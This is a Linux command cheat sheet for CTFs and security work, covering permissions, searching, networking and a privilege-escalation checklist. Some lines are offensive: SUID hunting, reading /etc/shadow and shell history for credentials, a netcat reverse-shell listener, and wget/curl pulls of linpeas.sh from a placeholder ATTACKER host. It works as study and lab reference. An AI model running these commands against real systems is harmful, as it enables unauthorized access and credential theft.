Linux command reference
The commands you reach for constantly in CTFs and on the job: enumeration, permissions, networking and searching.
Orientation
whoami # current user
id # uid, gid and group memberships
hostname # machine name
uname -a # kernel and architecture
pwd # where am I
sudo -l # what can I run as root? (priv-esc gold)
Files and permissions
ls -la # long listing incl. hidden files and permissions
chmod 640 file # set permissions (owner rw, group r, others none)
chmod +x script # make executable
chown user:grp f # change owner and group
stat file # full metadata incl. timestamps
Permission bits read as owner / group / others, each rwx:
| Symbolic | Octal | Meaning |
|---|---|---|
rwx |
7 | read + write + execute |
rw- |
6 | read + write |
r-x |
5 | read + execute |
r-- |
4 | read only |
So chmod 755 = owner full, group and others read+execute. The leading special bits matter for security:
find / -perm -4000 -type f 2>/dev/null # find SUID binaries (priv-esc)
find / -perm -2000 -type f 2>/dev/null # find SGID binaries
A SUID binary runs with its owner's privileges, not the caller's; a SUID-root program with a flaw is a classic local privilege-escalation route.
Searching
grep -r "password" /etc 2>/dev/null # recursive search for a string
grep -i pattern file # case-insensitive
find / -name "*.conf" 2>/dev/null # find by name
find /home -mtime -1 # modified in last 24h
locate filename # fast indexed search
which nmap # path of a command
Users, processes and services
cat /etc/passwd # accounts (note shells: nologin vs bash)
cat /etc/shadow # password hashes (root-readable only)
ps aux # all running processes
top / htop # live process view
systemctl status sshd # service state
crontab -l # scheduled jobs for current user
cat /etc/crontab # system-wide cron (priv-esc target)
Networking
ip a # interface addresses (replaces ifconfig)
ip route # routing table
ss -tulpn # listening TCP/UDP ports + owning process
netstat -tulpn # older equivalent of ss
curl -I http://host # fetch HTTP headers only
wget http://host/file # download a file
ping -c4 host # four ICMP echoes
dig example.com # DNS lookup
nc -lvnp 4444 # netcat listener (catch a reverse shell)
Permissions / privilege-escalation checklist
sudo -l # misconfigured sudo rights
find / -perm -4000 2>/dev/null # SUID binaries
cat /etc/crontab # writable scripts run as root?
ls -la /etc/cron.* # scheduled job directories
env # leaked secrets, PATH issues
cat ~/.bash_history # credentials in history
File transfer in a pinch
# On attacker box: serve current directory over HTTP
python3 -m http.server 8000
# On target: pull a file
wget http://ATTACKER:8000/linpeas.sh
curl http://ATTACKER:8000/tool -o tool
# Base64 a small file to copy/paste across a shell
base64 -w0 secret.bin
Quick reference: making sense of a shell
2>/dev/nulldiscards error output (used above to silence "permission denied" noise while searching as a low-priv user).|pipes one command's output into the next;>writes to a file (overwrite),>>appends.- A reverse shell connects from the target to you (useful past inbound firewalls); a bind shell listens on the target.